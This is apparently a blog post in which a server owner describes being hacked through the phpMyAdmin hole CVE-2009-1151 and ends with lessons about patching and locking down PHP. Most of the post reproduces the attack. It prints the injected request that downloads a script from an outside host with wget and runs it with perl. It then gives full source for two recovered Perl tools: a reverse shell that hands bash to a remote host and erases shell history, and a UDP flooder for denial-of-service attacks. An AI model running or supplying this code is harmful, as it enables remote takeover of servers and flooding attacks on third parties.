Yep, I was hacked 5 days ago. Seems I’ve been part of some DOS attack (I forgot to record the IPs of who, and it was only ~60GB of traffic).

From what I can tell, it exploited an (old, now patched) hole in PHPMyAdmin that let you write PHP files with what ever content you wanted. CVE-2009-1151. An implementation of that attack is available from GNU Citizen

Of course after that, you’re able to do anything the web server can. The command that was run on my server was:

/admin/phpmyadmin/config/config.inc.php?c=cd%20/tmp;wget%20mixtheremix.ucoz.com/robot.txt;perl%20robot.txt;rm%20-rf%20robot.txt

ucoz.com is a free website service. I was also unable to recover robot.txt

The script appear to download and execute two scripts:

back.txt

#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);

udp.pl

#!/usr/bin/perl


use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit http://hacking.3xforum.ro/ \n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Amu Floodez $ip pe portu $port \n";
printf "daca nu pica in 10 min dai pe alt port \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

What I’ve learnt:

  • Keep PHPMyAdmin up to date, because they suck at security (The whole idea of a PHP script being able to write a PHP script is stupid)
    • (Failing the last point) Don’t leave un-maintained PHP scripts in publicly accessible locations
    • Investigate in a way to disable system/eval in PHP (with a whitelist)